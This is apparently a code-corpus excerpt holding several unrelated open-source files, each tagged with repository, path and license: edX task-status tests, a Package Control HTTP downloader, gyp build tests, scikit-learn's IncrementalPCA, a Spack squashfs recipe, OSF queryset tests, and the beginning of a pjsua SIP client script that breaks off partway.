instructor_task = self._create_progress_entry(student)
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = SUCCESS
mock_result.result = {
'attempted': attempted,
'succeeded': succeeded,
'total': total,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
return output
def _get_email_output_for_task_success(self, attempted, succeeded, total, skipped=0):
"""returns the result returned by instructor_task_status()."""
instructor_task = self._create_email_subtask_entry(
total=total,
attempted=attempted,
succeeded=succeeded,
skipped=skipped,
task_state=SUCCESS,
)
return self._test_get_status_from_result(instructor_task.task_id)
def test_update_progress_to_success(self):
output = self._get_output_for_task_success(10, 8, 10)
self.assertEquals(output['message'], "Problem rescored for 8 of 10 students")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 10,
'succeeded': 8,
'total': 10,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_success_messages(self):
output = self._get_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any students with submissions to be rescored (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Problem failed to be rescored for any of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 10 students")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Problem rescored for 8 of 9 students (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Problem successfully rescored for 10 students")
self.assertTrue(output['succeeded'])
output = self._get_output_for_task_success(0, 0, 1, student=self.student)
self.assertTrue("Unable to find submission to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 0, 1, student=self.student)
self.assertTrue("Problem failed to be rescored for student" in output['message'])
self.assertFalse(output['succeeded'])
output = self._get_output_for_task_success(1, 1, 1, student=self.student)
self.assertTrue("Problem successfully rescored for student" in output['message'])
self.assertTrue(output['succeeded'])
def test_email_success_messages(self):
output = self._get_email_output_for_task_success(0, 0, 10)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients ")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients")
self.assertTrue(output['succeeded'])
output = self._get_email_output_for_task_success(0, 0, 10, skipped=3)
self.assertEqual(output['message'], "Unable to find any recipients to be emailed (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 0, 10, skipped=3)
self.assertEqual(output['message'], "Message failed to be emailed for any of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 10 recipients (skipping 3)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(9, 8, 10, skipped=3)
self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10, skipped=3)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients (skipping 3)")
self.assertTrue(output['succeeded'])
def test_get_info_for_queuing_task(self):
# get status for a task that is still running:
instructor_task = self._create_entry()
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_missing_output(self):
# check for missing task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = None
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_broken_output(self):
# check for non-JSON task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No parsable status information available")
def test_get_info_for_empty_output(self):
# check for JSON task_output with missing keys
instructor_task = self._create_success_entry()
instructor_task.task_output = "{}"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No progress status information available")
def test_get_info_for_broken_input(self):
# check for non-JSON task_input, but then just ignore it
instructor_task = self._create_success_entry()
instructor_task.task_input = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "Status: rescored 2 of 3 (out of 5)")
|
agpl-3.0
|
dostavro/dotfiles
|
sublime2/Packages/Package Control/package_control/downloaders/urllib_downloader.py
|
9
|
11280
|
import re
import os
import sys
from .. import http
try:
# Python 3
from http.client import HTTPException, BadStatusLine
from urllib.request import ProxyHandler, HTTPPasswordMgrWithDefaultRealm, ProxyBasicAuthHandler, ProxyDigestAuthHandler, build_opener, Request
from urllib.error import HTTPError, URLError
import urllib.request as urllib_compat
except (ImportError):
# Python 2
from httplib import HTTPException, BadStatusLine
from urllib2 import ProxyHandler, HTTPPasswordMgrWithDefaultRealm, ProxyBasicAuthHandler, ProxyDigestAuthHandler, build_opener, Request
from urllib2 import HTTPError, URLError
import urllib2 as urllib_compat
try:
# Python 3.3
import ConnectionError
except (ImportError):
# Python 2.6-3.2
from socket import error as ConnectionError
from ..console_write import console_write
from ..unicode import unicode_from_os
from ..http.validating_https_handler import ValidatingHTTPSHandler
from ..http.debuggable_http_handler import DebuggableHTTPHandler
from .rate_limit_exception import RateLimitException
from .downloader_exception import DownloaderException
from .cert_provider import CertProvider
from .decoding_downloader import DecodingDownloader
from .limiting_downloader import LimitingDownloader
from .caching_downloader import CachingDownloader
class UrlLibDownloader(CertProvider, DecodingDownloader, LimitingDownloader, CachingDownloader):
"""
A downloader that uses the Python urllib module
:param settings:
A dict of the various Package Control settings. The Sublime Text
Settings API is not used because this code is run in a thread.
"""
def __init__(self, settings):
self.opener = None
self.settings = settings
def close(self):
"""
Closes any persistent/open connections
"""
if not self.opener:
return
handler = self.get_handler()
if handler:
handler.close()
self.opener = None
def download(self, url, error_message, timeout, tries, prefer_cached=False):
"""
Downloads a URL and returns the contents
Uses the proxy settings from the Package Control.sublime-settings file,
however there seem to be a decent number of proxies that this code
does not work with. Patches welcome!
:param url:
The URL to download
:param error_message:
A string to include in the console error that is printed
when an error occurs
:param timeout:
The int number of seconds to set the timeout to
:param tries:
The int number of times to try and download the URL in the case of
a timeout or HTTP 503 error
:param prefer_cached:
If a cached version should be returned instead of trying a new request
:raises:
NoCaCertException: when no CA certs can be found for the url
RateLimitException: when a rate limit is hit
DownloaderException: when any other download error occurs
:return:
The string contents of the URL
"""
if prefer_cached:
cached = self.retrieve_cached(url)
if cached:
return cached
self.setup_opener(url, timeout)
debug = self.settings.get('debug')
error_string = None
while tries > 0:
tries -= 1
try:
request_headers = {
"User-Agent": self.settings.get('user_agent'),
# Don't be alarmed if the response from the server does not
# select one of these since the server runs a relatively new
# version of OpenSSL which supports compression on the SSL
# layer, and Apache will use that instead of HTTP-level
# encoding.
"Accept-Encoding": "gzip,deflate"
}
request_headers = self.add_conditional_headers(url, request_headers)
request = Request(url, headers=request_headers)
http_file = self.opener.open(request, timeout=timeout)
self.handle_rate_limit(http_file.headers, url)
result = http_file.read()
# Make sure the response is closed so we can re-use the connection
http_file.close()
encoding = http_file.headers.get('content-encoding')
result = self.decode_response(encoding, result)
return self.cache_result('get', url, http_file.getcode(),
http_file.headers, result)
except (HTTPException) as e:
# Since we use keep-alives, it is possible the other end closed
# the connection, and we may just need to re-open
if isinstance(e, BadStatusLine):
handler = self.get_handler()
if handler and handler.use_count > 1:
self.close()
self.setup_opener(url, timeout)
tries += 1
continue
error_string = u'%s HTTP exception %s (%s) downloading %s.' % (
error_message, e.__class__.__name__, unicode_from_os(e), url)
except (HTTPError) as e:
# Make sure the response is closed so we can re-use the connection
e.read()
e.close()
# Make sure we obey Github's rate limiting headers
self.handle_rate_limit(e.headers, url)
# Handle cached responses
if unicode_from_os(e.code) == '304':
return self.cache_result('get', url, int(e.code), e.headers, b'')
# Bitbucket and Github return 503 a decent amount
if unicode_from_os(e.code) == '503' and tries != 0:
error_string = u'Downloading %s was rate limited' % url
if tries:
error_string += ', trying again'
if debug:
console_write(error_string, True)
continue
error_string = u'%s HTTP error %s downloading %s.' % (
error_message, unicode_from_os(e.code), url)
except (URLError) as e:
# Bitbucket and Github timeout a decent amount
if unicode_from_os(e.reason) == 'The read operation timed out' \
or unicode_from_os(e.reason) == 'timed out':
error_string = u'Downloading %s timed out' % url
if tries:
error_string += ', trying again'
if debug:
console_write(error_string, True)
continue
error_string = u'%s URL error %s downloading %s.' % (
error_message, unicode_from_os(e.reason), url)
except (ConnectionError):
# Handle broken pipes/reset connections by creating a new opener, and
# thus getting new handlers and a new connection
error_string = u'Connection went away while trying to download %s, trying again' % url
if debug:
console_write(error_string, True)
self.opener = None
self.setup_opener(url, timeout)
tries += 1
continue
break
raise DownloaderException(error_string)
def get_handler(self):
"""
Get the HTTPHandler object for the current connection
"""
if not self.opener:
return None
for handler in self.opener.handlers:
if isinstance(handler, ValidatingHTTPSHandler) or isinstance(handler, DebuggableHTTPHandler):
return handler
def setup_opener(self, url, timeout):
"""
Sets up a urllib OpenerDirector to be used for requests. There is a
fair amount of custom urllib code in Package Control, and part of it
is to handle proxies and keep-alives. Creating an opener the way
below is because the handlers have been customized to send the
"Connection: Keep-Alive" header and hold onto connections so they
can be re-used.
:param url:
The URL to download
:param timeout:
The int number of seconds to set the timeout to
"""
if not self.opener:
http_proxy = self.settings.get('http_proxy')
https_proxy = self.settings.get('https_proxy')
if http_proxy or https_proxy:
proxies = {}
if http_proxy:
proxies['http'] = http_proxy
if https_proxy:
proxies['https'] = https_proxy
proxy_handler = ProxyHandler(proxies)
else:
proxy_handler = ProxyHandler()
password_manager = HTTPPasswordMgrWithDefaultRealm()
proxy_username = self.settings.get('proxy_username')
proxy_password = self.settings.get('proxy_password')
if proxy_username and proxy_password:
if http_proxy:
password_manager.add_password(None, http_proxy, proxy_username,
proxy_password)
if https_proxy:
password_manager.add_password(None, https_proxy, proxy_username,
proxy_password)
handlers = [proxy_handler]
basic_auth_handler = ProxyBasicAuthHandler(password_manager)
digest_auth_handler = ProxyDigestAuthHandler(password_manager)
handlers.extend([digest_auth_handler, basic_auth_handler])
debug = self.settings.get('debug')
if debug:
console_write(u"Urllib Debug Proxy", True)
console_write(u" http_proxy: %s" % http_proxy)
console_write(u" https_proxy: %s" % https_proxy)
console_write(u" proxy_username: %s" % proxy_username)
console_write(u" proxy_password: %s" % proxy_password)
secure_url_match = re.match('^https://([^/]+)', url)
if secure_url_match != None:
secure_domain = secure_url_match.group(1)
bundle_path = self.check_certs(secure_domain, timeout)
bundle_path = bundle_path.encode(sys.getfilesystemencoding())
handlers.append(ValidatingHTTPSHandler(ca_certs=bundle_path,
debug=debug, passwd=password_manager,
user_agent=self.settings.get('user_agent')))
else:
handlers.append(DebuggableHTTPHandler(debug=debug,
passwd=password_manager))
self.opener = build_opener(*handlers)
def supports_ssl(self):
"""
Indicates if the object can handle HTTPS requests
:return:
If the object supports HTTPS requests
"""
return 'ssl' in sys.modules and hasattr(urllib_compat, 'HTTPSHandler')
|
mit
|
overra/node-gyp
|
gyp/test/include_dirs/gyptest-default.py
|
102
|
1073
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies use of include_dirs when using the default build target.
"""
import TestGyp
test = TestGyp.TestGyp()
if test.format == 'scons':
test.skip_test('TODO: http://code.google.com/p/gyp/issues/detail?id=176\n')
test.run_gyp('includes.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('includes.gyp', test.ALL, chdir='relocate/src')
expect = """\
Hello from includes.c
Hello from inc.h
Hello from include1.h
Hello from subdir/inc2/include2.h
Hello from shadow2/shadow.h
"""
test.run_built_executable('includes', stdout=expect, chdir='relocate/src')
if test.format == 'xcode':
chdir='relocate/src/subdir'
else:
chdir='relocate/src'
expect = """\
Hello from subdir/subdir_includes.c
Hello from subdir/inc.h
Hello from include1.h
Hello from subdir/inc2/include2.h
"""
test.run_built_executable('subdir_includes', stdout=expect, chdir=chdir)
test.pass_test()
|
mit
|
MKV21/glimpse_client
|
3rdparty/breakpad/src/tools/gyp/test/generator-output/gyptest-copies.py
|
74
|
1802
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies file copies with --generator-output using an explicit build
target of 'all'.
"""
import TestGyp
# Ninja and Android don't support --generator-output.
test = TestGyp.TestGyp(formats=['!ninja', '!android'])
test.writable(test.workpath('copies'), False)
test.run_gyp('copies.gyp',
'--generator-output=' + test.workpath('gypfiles'),
chdir='copies')
test.writable(test.workpath('copies'), True)
test.relocate('copies', 'relocate/copies')
test.relocate('gypfiles', 'relocate/gypfiles')
test.writable(test.workpath('relocate/copies'), False)
test.writable(test.workpath('relocate/copies/build'), True)
test.writable(test.workpath('relocate/copies/copies-out'), True)
test.writable(test.workpath('relocate/copies/subdir/build'), True)
test.writable(test.workpath('relocate/copies/subdir/copies-out'), True)
test.build('copies.gyp', test.ALL, chdir='relocate/gypfiles')
test.must_match(['relocate', 'copies', 'copies-out', 'file1'],
"file1 contents\n")
if test.format == 'xcode':
chdir = 'relocate/copies/build'
elif test.format == 'make':
chdir = 'relocate/gypfiles/out'
else:
chdir = 'relocate/gypfiles'
test.must_match([chdir, 'Default', 'copies-out', 'file2'], "file2 contents\n")
test.must_match(['relocate', 'copies', 'subdir', 'copies-out', 'file3'],
"file3 contents\n")
if test.format == 'xcode':
chdir = 'relocate/copies/subdir/build'
elif test.format == 'make':
chdir = 'relocate/gypfiles/out'
else:
chdir = 'relocate/gypfiles'
test.must_match([chdir, 'Default', 'copies-out', 'file4'], "file4 contents\n")
test.pass_test()
|
bsd-3-clause
|
spallavolu/scikit-learn
|
sklearn/decomposition/incremental_pca.py
|
199
|
10508
|
"""Incremental Principal Components Analysis."""
# Author: Kyle Kastner <[email protected]>
# License: BSD 3 clause
import numpy as np
from scipy import linalg
from .base import _BasePCA
from ..utils import check_array, gen_batches
from ..utils.extmath import svd_flip, _batch_mean_variance_update
class IncrementalPCA(_BasePCA):
"""Incremental principal components analysis (IPCA).
Linear dimensionality reduction using Singular Value Decomposition of
centered data, keeping only the most significant singular vectors to
project the data to a lower dimensional space.
Depending on the size of the input data, this algorithm can be much more
memory efficient than a PCA.
This algorithm has constant memory complexity, on the order
of ``batch_size``, enabling use of np.memmap files without loading the
entire file into memory.
The computational overhead of each SVD is
``O(batch_size * n_features ** 2)``, but only 2 * batch_size samples
remain in memory at a time. There will be ``n_samples / batch_size`` SVD
computations to get the principal components, versus 1 large SVD of
complexity ``O(n_samples * n_features ** 2)`` for PCA.
Read more in the :ref:`User Guide <IncrementalPCA>`.
Parameters
----------
n_components : int or None, (default=None)
Number of components to keep. If ``n_components `` is ``None``,
then ``n_components`` is set to ``min(n_samples, n_features)``.
batch_size : int or None, (default=None)
The number of samples to use for each batch. Only used when calling
``fit``. If ``batch_size`` is ``None``, then ``batch_size``
is inferred from the data and set to ``5 * n_features``, to provide a
balance between approximation accuracy and memory consumption.
copy : bool, (default=True)
If False, X will be overwritten. ``copy=False`` can be used to
save memory but is unsafe for general use.
whiten : bool, optional
When True (False by default) the ``components_`` vectors are divided
by ``n_samples`` times ``components_`` to ensure uncorrelated outputs
with unit component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometimes
improve the predictive accuracy of the downstream estimators by
making data respect some hard-wired assumptions.
Attributes
----------
components_ : array, shape (n_components, n_features)
Components with maximum variance.
explained_variance_ : array, shape (n_components,)
Variance explained by each of the selected components.
explained_variance_ratio_ : array, shape (n_components,)
Percentage of variance explained by each of the selected components.
If all components are stored, the sum of explained variances is equal
to 1.0
mean_ : array, shape (n_features,)
Per-feature empirical mean, aggregate over calls to ``partial_fit``.
var_ : array, shape (n_features,)
Per-feature empirical variance, aggregate over calls to ``partial_fit``.
noise_variance_ : float
The estimated noise covariance following the Probabilistic PCA model
from Tipping and Bishop 1999. See "Pattern Recognition and
Machine Learning" by C. Bishop, 12.2.1 p. 574 or
http://www.miketipping.com/papers/met-mppca.pdf.
n_components_ : int
The estimated number of components. Relevant when ``n_components=None``.
n_samples_seen_ : int
The number of samples processed by the estimator. Will be reset on
new calls to fit, but increments across ``partial_fit`` calls.
Notes
-----
Implements the incremental PCA model from:
`D. Ross, J. Lim, R. Lin, M. Yang, Incremental Learning for Robust Visual
Tracking, International Journal of Computer Vision, Volume 77, Issue 1-3,
pp. 125-141, May 2008.`
See http://www.cs.toronto.edu/~dross/ivt/RossLimLinYang_ijcv.pdf
This model is an extension of the Sequential Karhunen-Loeve Transform from:
`A. Levy and M. Lindenbaum, Sequential Karhunen-Loeve Basis Extraction and
its Application to Images, IEEE Transactions on Image Processing, Volume 9,
Number 8, pp. 1371-1374, August 2000.`
See http://www.cs.technion.ac.il/~mic/doc/skl-ip.pdf
We have specifically abstained from an optimization used by authors of both
papers, a QR decomposition used in specific situations to reduce the
algorithmic complexity of the SVD. The source for this technique is
`Matrix Computations, Third Edition, G. Holub and C. Van Loan, Chapter 5,
section 5.4.4, pp 252-253.`. This technique has been omitted because it is
advantageous only when decomposing a matrix with ``n_samples`` (rows)
>= 5/3 * ``n_features`` (columns), and hurts the readability of the
implemented algorithm. This would be a good opportunity for future
optimization, if it is deemed necessary.
References
----------
D. Ross, J. Lim, R. Lin, M. Yang. Incremental Learning for Robust Visual
Tracking, International Journal of Computer Vision, Volume 77,
Issue 1-3, pp. 125-141, May 2008.
G. Golub and C. Van Loan. Matrix Computations, Third Edition, Chapter 5,
Section 5.4.4, pp. 252-253.
See also
--------
PCA
RandomizedPCA
KernelPCA
SparsePCA
TruncatedSVD
"""
def __init__(self, n_components=None, whiten=False, copy=True,
batch_size=None):
self.n_components = n_components
self.whiten = whiten
self.copy = copy
self.batch_size = batch_size
def fit(self, X, y=None):
"""Fit the model with X, using minibatches of size batch_size.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
y: Passthrough for ``Pipeline`` compatibility.
Returns
-------
self: object
Returns the instance itself.
"""
self.components_ = None
self.mean_ = None
self.singular_values_ = None
self.explained_variance_ = None
self.explained_variance_ratio_ = None
self.noise_variance_ = None
self.var_ = None
self.n_samples_seen_ = 0
X = check_array(X, dtype=np.float)
n_samples, n_features = X.shape
if self.batch_size is None:
self.batch_size_ = 5 * n_features
else:
self.batch_size_ = self.batch_size
for batch in gen_batches(n_samples, self.batch_size_):
self.partial_fit(X[batch])
return self
def partial_fit(self, X, y=None):
"""Incremental fit with X. All of X is processed as a single batch.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
self: object
Returns the instance itself.
"""
X = check_array(X, copy=self.copy, dtype=np.float)
n_samples, n_features = X.shape
if not hasattr(self, 'components_'):
self.components_ = None
if self.n_components is None:
self.n_components_ = n_features
elif not 1 <= self.n_components <= n_features:
raise ValueError("n_components=%r invalid for n_features=%d, need "
"more rows than columns for IncrementalPCA "
"processing" % (self.n_components, n_features))
else:
self.n_components_ = self.n_components
if (self.components_ is not None) and (self.components_.shape[0]
!= self.n_components_):
raise ValueError("Number of input features has changed from %i "
"to %i between calls to partial_fit! Try "
"setting n_components to a fixed value." % (
self.components_.shape[0], self.n_components_))
if self.components_ is None:
# This is the first pass through partial_fit
self.n_samples_seen_ = 0
col_var = X.var(axis=0)
col_mean = X.mean(axis=0)
X -= col_mean
U, S, V = linalg.svd(X, full_matrices=False)
U, V = svd_flip(U, V, u_based_decision=False)
explained_variance = S ** 2 / n_samples
explained_variance_ratio = S ** 2 / np.sum(col_var *
n_samples)
else:
col_batch_mean = X.mean(axis=0)
col_mean, col_var, n_total_samples = _batch_mean_variance_update(
X, self.mean_, self.var_, self.n_samples_seen_)
X -= col_batch_mean
# Build matrix of combined previous basis and new data
mean_correction = np.sqrt((self.n_samples_seen_ * n_samples) /
n_total_samples) * (self.mean_ -
col_batch_mean)
X_combined = np.vstack((self.singular_values_.reshape((-1, 1)) *
self.components_, X,
mean_correction))
U, S, V = linalg.svd(X_combined, full_matrices=False)
U, V = svd_flip(U, V, u_based_decision=False)
explained_variance = S ** 2 / n_total_samples
explained_variance_ratio = S ** 2 / np.sum(col_var *
n_total_samples)
self.n_samples_seen_ += n_samples
self.components_ = V[:self.n_components_]
self.singular_values_ = S[:self.n_components_]
self.mean_ = col_mean
self.var_ = col_var
self.explained_variance_ = explained_variance[:self.n_components_]
self.explained_variance_ratio_ = \
explained_variance_ratio[:self.n_components_]
if self.n_components_ < n_features:
self.noise_variance_ = \
explained_variance[self.n_components_:].mean()
else:
self.noise_variance_ = 0.
return self
|
bsd-3-clause
|
iulian787/spack
|
var/spack/repos/builtin/packages/squashfs/package.py
|
3
|
3214
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Squashfs(MakefilePackage):
"""Squashfs - read only compressed filesystem"""
homepage = 'http://squashfs.sourceforge.net'
url = 'https://downloads.sourceforge.net/project/squashfs/squashfs/squashfs4.3/squashfs4.3.tar.gz'
# version sha1
version('4.4', sha256='a981b3f3f2054b5a2e658851a3c06a2460ad04a9a8a645e0afe063a63fdbb07e')
version('4.3', sha256='0d605512437b1eb800b4736791559295ee5f60177e102e4d4ccd0ee241a5f3f6')
version('4.2', sha256='d9e0195aa922dbb665ed322b9aaa96e04a476ee650f39bbeadb0d00b24022e96')
version('4.1', sha256='3a870d065a25b3f5467bc6d9ed34340befab51a3f9e4b7e3792ea0ff4e06046a')
version('4.0', sha256='18948edbe06bac2c4307eea99bfb962643e4b82e5b7edd541b4d743748e12e21')
variant('gzip', default=True, description='Enable gzip compression support')
variant('lz4', default=False, description='Enable LZ4 compression support')
variant('lzo', default=False, description='Enable LZO compression support')
variant('xz', default=False, description='Enable xz compression support')
variant('zstd', default=False, description='Enable Zstandard/zstd support')
variant('default_compression', default='gzip', values=('gzip', 'lz4', 'lzo', 'xz', 'zstd'),
multi=False, description='Default compression algorithm')
conflicts('squashfs~gzip default_compression=gzip', msg='Cannot set default compression to missing algorithm')
conflicts('squashfs~lz4 default_compression=lz4', msg='Cannot set default compression to missing algorithm')
conflicts('squashfs~lzo default_compression=lzo', msg='Cannot set default compression to missing algorithm')
conflicts('squashfs~xz default_compression=xz', msg='Cannot set default compression to missing algorithm')
conflicts('squashfs~zstd default_compression=zstd', msg='Cannot set default compression to missing algorithm')
depends_on('m4', type='build')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('zlib', when='+gzip')
depends_on('lz4', when='+lz4')
depends_on('lzo', when='+lzo')
depends_on('xz', when='+xz')
depends_on('zstd', when='+zstd')
def build(self, spec, prefix):
with working_dir('squashfs-tools'):
default = spec.variants['default_compression'].value
make(
'GZIP_SUPPORT={0}'.format(1 if '+gzip' in spec else 0),
'LZ4_SUPPORT={0}' .format(1 if '+lz4' in spec else 0),
'LZO_SUPPORT={0}' .format(1 if '+lzo' in spec else 0),
'XZ_SUPPORT={0}' .format(1 if '+xz' in spec else 0),
'ZSTD_SUPPORT={0}'.format(1 if '+zstd' in spec else 0),
'COMP_DEFAULT={0}'.format(default),
parallel=False
)
def install(self, spec, prefix):
with working_dir('squashfs-tools'):
make('install', 'INSTALL_DIR=%s' % prefix.bin, parallel=False)
|
lgpl-2.1
|
Nesiehr/osf.io
|
osf_tests/test_eager_queryset.py
|
4
|
1107
|
import pytest
from osf.models import Node
from osf_tests.factories import NodeFactory
@pytest.mark.django_db
class TestEagerQuerySet:
@pytest.mark.django_assert_num_queries
def test_select_related_does_correct_query(self, django_assert_num_queries):
node = NodeFactory()
node_id = node.id
with django_assert_num_queries(1):
fresh_node = Node.objects.select_related('creator').get(id=node_id)
cr = fresh_node.creator
@pytest.mark.django_assert_num_queries
def test_eager_fk_does_correct_query(self, django_assert_num_queries):
node = NodeFactory()
node_id = node.id
with django_assert_num_queries(1):
fresh_node = Node.objects.eager('creator').get(id=node_id)
cr = fresh_node.creator
@pytest.mark.django_assert_num_queries
def test_lazy_fk_does_correct_queries(self, django_assert_num_queries):
node = NodeFactory()
node_id = node.id
with django_assert_num_queries(2):
fresh_node = Node.objects.get(id=node_id)
cr = fresh_node.creator
|
apache-2.0
|
G0retZ/pjproject
|
pjsip-apps/src/py_pjsua/pjsua_app.py
|
33
|
21600
|
# $Id$
#
# Sample and simple Python script to make and receive calls, and do
# presence and instant messaging/IM using PJSUA-API binding for Python.
#
# Copyright (C) 2003-2007 Benny Prijono <[email protected]>
#
import py_pjsua
import sys
import thread
#
# Configurations
#
THIS_FILE = "pjsua_app.py"
C_QUIT = 0
C_LOG_LEVEL = 4
# STUN config.
# Set C_STUN_HOST to the address:port of the STUN server to enable STUN
#
C_STUN_HOST = ""
#C_STUN_HOST = "192.168.0.2"
#C_STUN_HOST = "stun.iptel.org:3478"
# SIP port
C_SIP_PORT = 5060
# Globals
#
g_ua_cfg = None
g_acc_id = py_pjsua.PJSUA_INVALID_ID
g_current_call = py_pjsua.PJSUA_INVALID_ID
g_wav_files = []
g_wav_id = 0
g_wav_port = 0
g_rec_file = ""
g_rec_id = 0
g_rec_port = 0
# Utility: display PJ error and exit
#
def err_exit(title, rc):
py_pjsua.perror(THIS_FILE, title, rc)
py_pjsua.destroy()
exit(1)
# Logging function (also callback, called by pjsua-lib)
#
def log_cb(level, str, len):
if level <= C_LOG_LEVEL:
print str,
def write_log(level, str):
log_cb(level, str + "\n", 0)
# Utility to get call info
#
def call_name(call_id):
ci = py_pjsua.call_get_info(call_id)
return "[Call " + `call_id` + " " + ci.remote_info + "]"
# Callback when call state has changed.
#
def on_call_state(call_id, e):
global g_current_call
ci = py_pjsua.call_get_info(call_id)
write_log(3, call_name(call_id) + " state = " + `ci.state_text`)
if ci.state == py_pjsua.PJSIP_INV_STATE_DISCONNECTED:
g_current_call = py_pjsua.PJSUA_INVALID_ID
# Callback for incoming call
#
def on_incoming_call(acc_id, call_id, rdata):
global g_current_call
if g_current_call != py_pjsua.PJSUA_INVALID_ID:
# There's call in progress - answer Busy
py_pjsua.call_answer(call_id, 486, None, None)
return
g_current_call = call_id
ci = py_pjsua.call_get_info(call_id)
write_log(3, "*** Incoming call: " + call_name(call_id) + "***")
write_log(3, "*** Press a to answer or h to hangup ***")
# Callback when media state has changed (e.g. established or terminated)
#
def on_call_media_state(call_id):
ci = py_pjsua.call_get_info(call_id)
if ci.media_status == py_pjsua.PJSUA_CALL_MEDIA_ACTIVE:
py_pjsua.conf_connect(ci.conf_slot, 0)
py_pjsua.conf_connect(0, ci.conf_slot)
write_log(3, call_name(call_id) + ": media is active")
else:
write_log(3, call_name(call_id) + ": media is inactive")
# Callback when account registration state has changed
#
def on_reg_state(acc_id):
acc_info = py_pjsua.acc_get_info(acc_id)
if acc_info.has_registration != 0:
cmd = "registration"
else:
cmd = "unregistration"
if acc_info.status != 0 and acc_info.status != 200:
write_log(3, "Account " + cmd + " failed: rc=" + `acc_info.status` + " " + acc_info.status_text)
else:
write_log(3, "Account " + cmd + " success")
# Callback when buddy's presence state has changed
#
def on_buddy_state(buddy_id):
write_log(3, "On Buddy state called")
buddy_info = py_pjsua.buddy_get_info(buddy_id)
if buddy_info.status != 0 and buddy_info.status != 200:
write_log(3, "Status of " + `buddy_info.uri` + " is " + `buddy_info.status_text`)
else:
write_log(3, "Status : " + `buddy_info.status`)
# Callback on incoming pager (MESSAGE)
#
def on_pager(call_id, strfrom, strto, contact, mime_type, text):
write_log(3, "MESSAGE from " + `strfrom` + " : " + `text`)
# Callback on the delivery status of outgoing pager (MESSAGE)
#
def on_pager_status(call_id, strto, body, user_data, status, reason):
write_log(3, "MESSAGE to " + `strto` + " status " + `status` + " reason " + `reason`)
# Received typing indication
#
def on_typing(call_id, strfrom, to, contact, is_typing):
str_t = ""
if is_typing:
str_t = "is typing.."
else:
str_t = "has stopped typing"
write_log(3, "IM indication: " + strfrom + " " + str_t)
# Received the status of previous call transfer request
#
def on_call_transfer_status(call_id,status_code,status_text,final,p_cont):
strfinal = ""
if final == 1:
strfinal = "[final]"
write_log(3, "Call " + `call_id` + ": transfer status= " + `status_code` + " " + status_text+ " " + strfinal)
if status_code/100 == 2:
write_log(3, "Call " + `call_id` + " : call transferred successfully, disconnecting call")
status = py_pjsua.call_hangup(call_id, 410, None, None)
p_cont = 0
# Callback on incoming call transfer request
#
def on_call_transfer_request(call_id, dst, code):
write_log(3, "Call transfer request from " + `call_id` + " to " + dst + " with code " + `code`)
#
# Initialize pjsua.
#
def app_init():
global g_acc_id, g_ua_cfg
# Create pjsua before anything else
status = py_pjsua.create()
if status != 0:
err_exit("pjsua create() error", status)
# Create and initialize logging config
log_cfg = py_pjsua.logging_config_default()
log_cfg.level = C_LOG_LEVEL
log_cfg.cb = log_cb
